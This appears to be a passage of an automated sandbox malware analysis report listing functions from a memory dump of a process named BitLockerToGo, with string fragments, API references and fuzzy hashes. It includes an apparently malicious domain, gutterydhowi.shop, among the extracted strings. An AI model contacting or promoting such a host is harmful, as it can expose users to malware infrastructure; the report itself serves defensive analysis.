String ID: -0$97$q9$%#$-+$yw$}{
API String ID: 0-833901250
Opcode ID: cafa94da47342f0154f15b488f154966b9cbafe598491fbb65a7bdc3b253a633
Instruction ID: 5b152b28cfe96facdd2c25bbf013095aabd2af11fdc7cda3c20002848c044014
Opcode Fuzzy Hash: cafa94da47342f0154f15b488f154966b9cbafe598491fbb65a7bdc3b253a633
Instruction Fuzzy Hash: FAC112B5100B009FD324CF25D884B16BBB1BB45358F248AADD89A8FB92D736E447CF94

Function 00437420 Relevance: 8.8, Strings: 7, Instructions: 89COMMON

Download Yara Rule

Strings

yxC, xrefs: 004374AC
V~C, xrefs: 00437551
>}C, xrefs: 004376BC
3~C, xrefs: 00437504
|C, xrefs: 004376B1
a}C, xrefs: 004374A1
3~C, xrefs: 0043750F

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 3~C$3~C$>}C$V~C$a}C$yxC$|C
API String ID: 0-2330518001
Opcode ID: dc13dc4a48678fe84a2a704d9b559ca9ac3767a1799df0c91f927796cfbac3e1
Instruction ID: 5bb677f51235c4e311899bd24bfd966ee410a663871a9f110b4c51a09a1ca9d6
Opcode Fuzzy Hash: dc13dc4a48678fe84a2a704d9b559ca9ac3767a1799df0c91f927796cfbac3e1
Instruction Fuzzy Hash: CD510FB011A3859BD371DF11D14C7CFBAF0AB8138AF50991E98995B242E7B9464C8F8A

Function 0040166E Relevance: 7.9, Strings: 6, Instructions: 402COMMON

Download Yara Rule

Strings

+, xrefs: 00401547
gfff, xrefs: 00401D26
gfff, xrefs: 00401D3B
0123456789abcdefxp, xrefs: 00401678
0123456789ABCDEFXP, xrefs: 0040166E
gfff, xrefs: 00401D88

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: +$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-925659942
Opcode ID: 1c123ff53a0125d398bf8382770841fef753c39f044d963971cdc368b22a93ac
Instruction ID: 5bd934b01d3d346995b4b594b50ff94621fc5d74c3519a41b9f519668a956a09
Opcode Fuzzy Hash: 1c123ff53a0125d398bf8382770841fef753c39f044d963971cdc368b22a93ac
Instruction Fuzzy Hash: 4AE1C3316083928FC719CE28C58436BFBE2ABD5304F588A3EE8D5973D5D678DC458B86

Function 0040136B Relevance: 7.8, Strings: 6, Instructions: 320COMMON

Download Yara Rule

Strings

gfff, xrefs: 00401D26
gfff, xrefs: 00401D3B
0123456789abcdefxp, xrefs: 00401375
0123456789ABCDEFXP, xrefs: 0040136B
-, xrefs: 00401CF5
gfff, xrefs: 00401D88

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff
API String ID: 0-854689426
Opcode ID: 74f56d7d52785bbf49a077f02503b36a5193bd7759bc2b20a86df8c527597fdc
Instruction ID: b8511c31b4cae8459ae150c87d7dc307d1d0dc1548314fc5627e67a682d98665
Opcode Fuzzy Hash: 74f56d7d52785bbf49a077f02503b36a5193bd7759bc2b20a86df8c527597fdc
Instruction Fuzzy Hash: 0DC1D4716083929FC715CE28C48425BFBE1ABD5304F488A2EF8D9973D6D778ED058B86

Function 00428DF0 Relevance: 7.7, Strings: 6, Instructions: 159COMMON

Download Yara Rule

Strings

_=Y, xrefs: 00428E0D
wq, xrefs: 00428E5D
su, xrefs: 00428F09
CE, xrefs: 00428F69
HK, xrefs: 00428F79
{'e!, xrefs: 00428EA3, 00428EAB

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: _=Y$HK${'e!$CE$su$wq
API String ID: 0-279535874
Opcode ID: 6c230f3cda5c3ff20a7d6d61756c61cc5bb1f594a13246578bb90bbdd5e5b4db
Instruction ID: 5fa39e8af66b862feb17eecf3ba76a97eb31ba5963f4f57035cf6029c2e28e80
Opcode Fuzzy Hash: 6c230f3cda5c3ff20a7d6d61756c61cc5bb1f594a13246578bb90bbdd5e5b4db
Instruction Fuzzy Hash: 0D5120B450D384ABD310EF15D980B1EFBE4ABA2B84F94491CF1D49B252C3769905CBAB

Function 004012BF Relevance: 7.1, Strings: 5, Instructions: 853COMMON

Download Yara Rule

Strings

, xrefs: 0040291C
0, xrefs: 004021F5
0, xrefs: 004022D3
0, xrefs: 004024D2
@, xrefs: 00402728

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: $0$0$0$@
API String ID: 0-11853210
Opcode ID: 02adf73b844b44bb6fbab9a5ee12674885b37ec80769ae78588cb07098a610e6
Instruction ID: 5d757e83736ab605203ba440cc37e49a63b12527c21360e7c47d831cebd8c944
Opcode Fuzzy Hash: 02adf73b844b44bb6fbab9a5ee12674885b37ec80769ae78588cb07098a610e6
Instruction Fuzzy Hash: 2E62C171A083518FC718CE28C59472BBBE1ABC9704F14896EE8D9A73D1D7B8DD05CB86

Function 0043A2E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0043A317
GetSystemMetrics.USER32 ref: 0043A326

Strings

, xrefs: 0043A3D1

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 6a58d11c35fd4d34b6040ed1a14b1abdb906224f296806754ce7745ed84503f5
Instruction ID: 989bfac8fcaf89e7189a23b5764da58480aa2aa662ee37ca34e1c2a082387f79
Opcode Fuzzy Hash: 6a58d11c35fd4d34b6040ed1a14b1abdb906224f296806754ce7745ed84503f5
Instruction Fuzzy Hash: C831BDB49182008FDB00EF69D98561EBBF4BB89304F11893DE898DB360D774A949CF86

Function 00410BAE Relevance: 5.3, Strings: 4, Instructions: 330COMMON

Download Yara Rule

Strings

P], xrefs: 00410CC3, 00410CCB
gutterydhowi.shop, xrefs: 00410C13
WR, xrefs: 00410C9B
n%F', xrefs: 00410D8B

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: P]$WR$gutterydhowi.shop$n%F'
API String ID: 0-4251651716
Opcode ID: 0ae0a339f4d06d4ec3d2ff79518de99d98b5e9bdcacd69e18e044e08042cec22
Instruction ID: bb36d8051bbdf0c76b98c5bebabb91f1edabf66111b970f0f15bfc215fe2a2ad
Opcode Fuzzy Hash: 0ae0a339f4d06d4ec3d2ff79518de99d98b5e9bdcacd69e18e044e08042cec22
Instruction Fuzzy Hash: 50B17874108381EFD3449F54D894A6FBBF8EF8A386F50492DF58687262C739D884CB5A

Function 004490D0 Relevance: 4.0, Strings: 3, Instructions: 288COMMON

Download Yara Rule

Strings

4`[b, xrefs: 004492F0
%&' , xrefs: 00449114, 00449120
%&' , xrefs: 004492B4, 004492BD

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: %&' $%&' $4`[b
API String ID: 2994545307-612491952
Opcode ID: 5d38c8c7cb148ad8d03252e91a03304b95b1f0233fb3877f074696df5f5616de
Instruction ID: d5e11e46fccf3a6e36675dbe633d22f88e84b6cee38b175ffb5cf66ada1407c9
Opcode Fuzzy Hash: 5d38c8c7cb148ad8d03252e91a03304b95b1f0233fb3877f074696df5f5616de
Instruction Fuzzy Hash: 84A1BF71608301ABF720DF55D841B6BB7E5EB8A354F54482EF98487392E734EC40EB9A

Function 00413B52 Relevance: 3.3, Strings: 2, Instructions: 765COMMON

Download Yara Rule

Strings

mA, xrefs: 00414D03
Z, xrefs: 00414EF4

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Z$mA
API String ID: 0-1798879754
Opcode ID: fee936d7766d8afa8e6e7fcd610e84c132aad3e692d0dcedaeb5ed2076683c9b
Instruction ID: df1ce87b35dfd775c14fb308421a10d4e2525954289e0b440acfff14497acee5
Opcode Fuzzy Hash: fee936d7766d8afa8e6e7fcd610e84c132aad3e692d0dcedaeb5ed2076683c9b
Instruction Fuzzy Hash: D132AFB15083409FD715DF64D880B6FBBE4BF9A348F04092EF48993262E778D985CB5A

Function 0041445A Relevance: 3.2, Strings: 2, Instructions: 675COMMON

Download Yara Rule

Strings

mA, xrefs: 00414D03
Z, xrefs: 00414EF4

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Z$mA
API String ID: 0-1798879754
Opcode ID: 87f13909f5b4c9ca3b105ba35803b194af1dabbf40ad094a76166b2a401633df
Instruction ID: d87570fef0f65833817776620210d609605bcf8c912082ae06b9b4e5ba298a27
Opcode Fuzzy Hash: 87f13909f5b4c9ca3b105ba35803b194af1dabbf40ad094a76166b2a401633df
Instruction Fuzzy Hash: 1922AFB15083409FD704DF64D880B6FBBE4BF9A348F04492EF485932A2E778D985CB5A

Function 00413D32 Relevance: 3.0, Strings: 2, Instructions: 476COMMON

Download Yara Rule

Strings

%5, xrefs: 00414B79
2, xrefs: 00414ABC

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %5$2
API String ID: 0-2906068813
Opcode ID: 0401abd227be6702f4c61abac874157d2361f2debf3cca60c915632f44bf070c
Instruction ID: fad10d0927c259007a1f6b6fe9d239cb333c30beef6965d292bd947fbdc51366
Opcode Fuzzy Hash: 0401abd227be6702f4c61abac874157d2361f2debf3cca60c915632f44bf070c
Instruction Fuzzy Hash: 72E1DEB59083419BD704DF24D880A6FBBE0BFC6358F05492DF48993391E778E885CB9A

Function 0042F64F Relevance: 3.0, Strings: 2, Instructions: 468COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0042FB80
pxu0, xrefs: 0042F9D4

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$pxu0
API String ID: 0-1356635000
Opcode ID: a13249a8aad5706caff5b5a6ba24935b5cc74cc15ea5cf53173e50919c5e3784
Instruction ID: 1dd97671328cebd434c4301f5369cdb5b209c5d1604f41a458f0571a78c6839a
Opcode Fuzzy Hash: a13249a8aad5706caff5b5a6ba24935b5cc74cc15ea5cf53173e50919c5e3784
Instruction Fuzzy Hash: DEF12671E04255CFDB15CFA8E8507BEBBB1AF0A301F944579E441AB392C339AE45CB68

Function 00426EF0 Relevance: 2.9, Strings: 2, Instructions: 413COMMON

Download Yara Rule

Strings

4`[b, xrefs: 00427330
8'&%, xrefs: 0042711A

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$8'&%
API String ID: 0-2513922139
Opcode ID: 3e6dcdc1cd6a29b7210cc2800d98b353730cf5e7c6827b5e9cdc74b1bdac7cc0
Instruction ID: 1a9807a6de1dc82ac61f788911c58b09674b5c14e02ca9194d8498b858b70894
Opcode Fuzzy Hash: 3e6dcdc1cd6a29b7210cc2800d98b353730cf5e7c6827b5e9cdc74b1bdac7cc0
Instruction Fuzzy Hash: 69C1CE716083209BD710EB14E881A2BB7F4EF56354F89495EF8C49B352E339D914CBAB

Function 004036F0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON

Download Yara Rule

Strings

NaN, xrefs: 0040374E
Inf, xrefs: 00403747

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: Inf$NaN
API String ID: 0-3500518849
Opcode ID: b6549af26c55c7d79ca9a26f67566e8b63663412c14c241ccfb870ae07da0e1a
Instruction ID: 3ec383912622633db6ec13d9f35661abb9a528f041bdcfdca005203563258ef7
Opcode Fuzzy Hash: b6549af26c55c7d79ca9a26f67566e8b63663412c14c241ccfb870ae07da0e1a
Instruction Fuzzy Hash: FDD1D8B1A083019BC704CF29C98061FBBE5EBC4754F25893EF899A73D1D675DD058B86

Function 00449950 Relevance: 2.9, Strings: 2, Instructions: 378COMMON

Download Yara Rule

Strings

%&' , xrefs: 00449C53, 00449C5B
P, xrefs: 00449AF7

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %&' $P
API String ID: 0-923373239
Opcode ID: 94c2b66e2899fa01ff83b8fb14724331c3001e622c5e04a5c28a0adbf7ed5be5
Instruction ID: 5e81c9176a0e38809e2cd36d503f3fadeff92ab2e40075654d1fbbe51e15b5d6
Opcode Fuzzy Hash: 94c2b66e2899fa01ff83b8fb14724331c3001e622c5e04a5c28a0adbf7ed5be5
Instruction Fuzzy Hash: D7D104329082604FE725CE18E89071FB6E1EB85718F158A3DE8A5AB391CB79DC05D7C6

Function 0042C170 Relevance: 2.9, Strings: 2, Instructions: 374COMMON

Download Yara Rule

Strings

yjUF, xrefs: 0042C4F0
Homx, xrefs: 0042C533, 0042C53B

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: Homx$yjUF
API String ID: 2994545307-3101540543
Opcode ID: 77fee60f1af2264a6b5470b0b7d87de78e6337d4febcada49422ab3caec59268
Instruction ID: 3bc481f26cfa58171efb662ef6f83a1c3b7f0d0b479d5cba61ac0245ae3c45e4
Opcode Fuzzy Hash: 77fee60f1af2264a6b5470b0b7d87de78e6337d4febcada49422ab3caec59268
Instruction Fuzzy Hash: 65B11270A083109BD710EF54E880B2FB7E1EF95314F54892EE9C58B352E739E944CB9A

Function 004335DA Relevance: 2.9, Strings: 2, Instructions: 367COMMON

Download Yara Rule

Strings

f@~T, xrefs: 004338D1
$r#, xrefs: 004338DB

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: $r#$f@~T
API String ID: 0-1680286069
Opcode ID: e007d8cd7ebcee54b9764732142cc74440b486a0889d50e464545c5b9d4e5144
Instruction ID: a06970b1e8eb21c98106ca307475734b7e2f812d3265f34665c999763f097265
Opcode Fuzzy Hash: e007d8cd7ebcee54b9764732142cc74440b486a0889d50e464545c5b9d4e5144
Instruction Fuzzy Hash: 2AD18C70508B809EE726CF3984507A3FBE1AF1B305F4859AED4EA87792C739E505CB19

Function 00448ED0 Relevance: 2.7, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

%&' , xrefs: 00448F73, 00448F7B
4`[b, xrefs: 00449090

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %&' $4`[b
API String ID: 0-3857453902
Opcode ID: c77f4d3929b5fefabe1d79ec16ec006c61f8c8f92054b4d7352da5f4f0807759
Instruction ID: 1952d3ba2715ebf1d2bedd8c15c6c7a9d56fae78d0666ac1ea704f69cf3bc8d6
Opcode Fuzzy Hash: c77f4d3929b5fefabe1d79ec16ec006c61f8c8f92054b4d7352da5f4f0807759
Instruction Fuzzy Hash: B75116316093009BE7249A18DC90B2FBBE6EF85724F248A2DF9D957391C739DC04D79A

Function 0044B6D0 Relevance: 2.6, Strings: 2, Instructions: 98COMMON

Download Yara Rule

Strings

@, xrefs: 0044B738
%&' , xrefs: 0044B783, 0044B78B

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: %&' $@
API String ID: 2994545307-717135571
Opcode ID: 75db2c7cb2691f6813dd925202fcde2d69dac661108870f68018b4a0ae74be77
Instruction ID: 88ecd58da5d0c1391c8eb9a91c67d93ba80987fdf2013cfacaab3f0f5512e9ab
Opcode Fuzzy Hash: 75db2c7cb2691f6813dd925202fcde2d69dac661108870f68018b4a0ae74be77
Instruction Fuzzy Hash: 8A316B719083049BD324DF19D880A2BFBF5EFC9318F14992DE9C897251E339D904CB9A

Function 004452C0 Relevance: 1.8, Strings: 1, Instructions: 569COMMON

Download Yara Rule

Strings

f, xrefs: 00445488

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: f
API String ID: 0-1993550816
Opcode ID: 9441baff299ace1297a8a2256d8e37b55ec9b50774d1221b76979dca7e2b6c20
Instruction ID: e7bb0b904086fc456ac207711c49831b0bb56eaa988f05436f54c761f57745ee
Opcode Fuzzy Hash: 9441baff299ace1297a8a2256d8e37b55ec9b50774d1221b76979dca7e2b6c20
Instruction Fuzzy Hash: 4222BF716087409FEB14CF18C840B2FBBE5BB85314F588A2EF8959B392D739D905CB96

Function 004052C0 Relevance: 1.8, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

%1.17g, xrefs: 00405680

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %1.17g
API String ID: 0-1551345525
Opcode ID: a3d0d657e05d2d59d5b9a1abdd7661bcbb97d5412639aef2aabf12514e830570
Instruction ID: 3c015679ecdf1780150be8e712d21141293eea67851df3103ba24970c89b45d6
Opcode Fuzzy Hash: a3d0d657e05d2d59d5b9a1abdd7661bcbb97d5412639aef2aabf12514e830570
Instruction Fuzzy Hash: C212F6B6A04B418BE7258E148440327BBE2EFA1314F19C57FD899AB3D1E779CC05CB46

Function 0042E3C2 Relevance: 1.7, Strings: 1, Instructions: 497COMMON

Download Yara Rule

Strings

B, xrefs: 0042E6D5

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: B
API String ID: 0-3806887055
Opcode ID: 1b3000f7267cca3a025a4438bbd4971b1d342e3a62f9d6141f02cd7fe8f295d7
Instruction ID: 69c84965dde07b0b8c46955ec6f3eb5c0a6e830dee20237feb0c0fe334c5f1d7
Opcode Fuzzy Hash: 1b3000f7267cca3a025a4438bbd4971b1d342e3a62f9d6141f02cd7fe8f295d7
Instruction Fuzzy Hash: B012ABB0D002199FDB11DFA9D5806AEBBB1EF06300FA4855DE895BB382C7349905CFE2

Function 00426C80 Relevance: 1.7, APIs: 1, Instructions: 245comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0044EB80,00000000,00000001,0044EB70), ref: 00426CA9

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 7099cb08e5c9ed2470b701ba37ea3b507666c3757062d8f759042eaab194ddb2
Instruction ID: ac000463aa69b93c78c6ae5edb86fe5d03f9c1fc2e6432c9ec10f9efe43ec18b
Opcode Fuzzy Hash: 7099cb08e5c9ed2470b701ba37ea3b507666c3757062d8f759042eaab194ddb2
Instruction Fuzzy Hash: 5C61EFB47002189BDB20DF24EC92BA773B4FF81358F464659E946CB3A1E778E804C769

Function 00430C40 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

", xrefs: 00430F99

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: fad59ae6eeeaada44421087dd7d4ccacee9b2122b7114a61df8ae77ed2499413
Instruction ID: c71316393b6045b6d3847f394238f5a0614429b02f357fbba46dd37157de5afb
Opcode Fuzzy Hash: fad59ae6eeeaada44421087dd7d4ccacee9b2122b7114a61df8ae77ed2499413
Instruction Fuzzy Hash: 19D116B2A083149FD728CE24C45176BB7E5AF88314F199B2FE89587382E77CDC458786

Function 0044BDC0 Relevance: 1.5, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

%&' , xrefs: 0044BDF3, 0044BDFB

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %&'
API String ID: 0-1807952111
Opcode ID: ff6a93c9104a0646b59a6ee829c49e98695aeee51bb2e454730eb4f7871adb42
Instruction ID: 4e811affb48a31d4a8892236ba50a90b8565bbb1ef290a92a14af062584b9905
Opcode Fuzzy Hash: ff6a93c9104a0646b59a6ee829c49e98695aeee51bb2e454730eb4f7871adb42
Instruction Fuzzy Hash: B891E1312093019BD724DF68D880A2BB3E1EF89714F19892EE985C7351E735EC50CB8A

Function 0041DE74 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

sz, xrefs: 0041DEB0

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: sz
API String ID: 0-3245299906
Opcode ID: 1f427e440ae1ccf82bda40b727cfda7271ced3024e465076ce11ec3a5784d0cc
Instruction ID: d0e8c61e7031b4ad3de63e3c6715c00227a0a90541bd59440ada390308e52876
Opcode Fuzzy Hash: 1f427e440ae1ccf82bda40b727cfda7271ced3024e465076ce11ec3a5784d0cc
Instruction Fuzzy Hash: 93C17A756083809BE734CF16C850BEFBBE2BBD5744F14482DE9C98B251D37A9881CB96

Function 0044BAF0 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

%&' , xrefs: 0044BBE3, 0044BBEB

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %&'
API String ID: 0-1807952111
Opcode ID: 10a9e4f25f2dbb7e7c2e668ce040cb24bf1ec81fbe851355dd954589f9e7ab69
Instruction ID: 6a19799660bd75fbebb8b64cf98191e830c20eeae2c4778791744c9628885500
Opcode Fuzzy Hash: 10a9e4f25f2dbb7e7c2e668ce040cb24bf1ec81fbe851355dd954589f9e7ab69
Instruction Fuzzy Hash: F381CE746083419BE724DF29D8D0A2BB7F5EF89714F04896EE9858B351E734EC10CB9A

Function 00438A50 Relevance: 1.5, Strings: 1, Instructions: 257COMMON

Download Yara Rule

Strings

000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 00438CB5

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081
API String ID: 0-2471034898
Opcode ID: 9a5323ec068d47f18054f0c0520a09a6944f2b9b691d336293edcabd3336f34d
Instruction ID: e534a2153d79cd823c8467f42c55b7ae0a47ac036bb04f1fa4e3a6aadc111344
Opcode Fuzzy Hash: 9a5323ec068d47f18054f0c0520a09a6944f2b9b691d336293edcabd3336f34d
Instruction Fuzzy Hash: 34811C73A1AA5147C718893C5C112A6EA535BDA334B3ED37FF8B5CB3E5C9289C024355

Function 00431110 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0043130E

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: e0895352faa9e5936403c2c4a3b4eabb7faac10e28ed4381423bb647d4909d64
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: A3712B32B083154BEB14CE68C48035FB7E2ABCD750F29E56FE894973A1D638DD45878A

Function 00436DB0 Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00436E9A

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
API String ID: 0-2272463933
Opcode ID: 5b24913f77c332cf7d9b17e84ed288c454fa876a0ee093bf3652c800620b5ddf
Instruction ID: 922e9cab320b514d3fc3a4757c4518ab14ed630ebfc2e957a71e5c5bef395588
Opcode Fuzzy Hash: 5b24913f77c332cf7d9b17e84ed288c454fa876a0ee093bf3652c800620b5ddf
Instruction Fuzzy Hash: 8C61383BA195A15BC7244E3C9C012A9AA431BEB374B3F9377DCB49B3E1C52A8C064395

Function 004405A4 Relevance: 1.5, Strings: 1, Instructions: 206COMMON

Download Yara Rule

